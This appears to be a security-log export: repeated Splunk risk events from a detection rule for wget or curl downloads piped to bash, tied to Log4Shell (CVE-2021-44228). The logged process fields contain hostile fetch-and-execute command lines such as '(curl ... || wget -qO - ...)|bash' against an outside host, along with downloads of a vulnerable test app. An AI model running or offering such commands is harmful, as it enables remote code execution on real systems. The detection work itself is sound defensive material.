info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638217, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", 
count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638217, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638217, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", 
annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638217, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638217, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic 
identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638217, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download 
a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638217, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638217, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", 
lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638217, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638217, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", 
annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638217, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu"